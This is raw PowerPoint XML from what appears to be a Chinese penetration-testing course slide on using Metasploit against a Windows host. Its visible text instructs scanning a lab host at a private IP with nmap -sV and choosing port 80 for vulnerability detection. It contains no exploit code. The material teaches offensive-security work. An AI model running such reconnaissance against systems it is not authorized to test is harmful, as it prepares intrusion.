              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具对Windows主机进行渗透测试</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="文本框 137"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5313680" y="1350327"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.对IP为“192.168.172.129”的主机进行扫描。首先使用nmap工具的“-sV”参数扫描其开放端口的对应服务。如图2-4-49所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5313680" y="2272347"/>
            <a:ext cx="5276850" cy="2095500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="文本框 138"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5313680" y="4367847"/>
            <a:ext cx="5080000" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-49 扫描开放端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以看到，目标主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>操作系统有很多开放的端口，这里选取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>端口进行漏洞检测。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具对Windows主机进行渗透测试</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
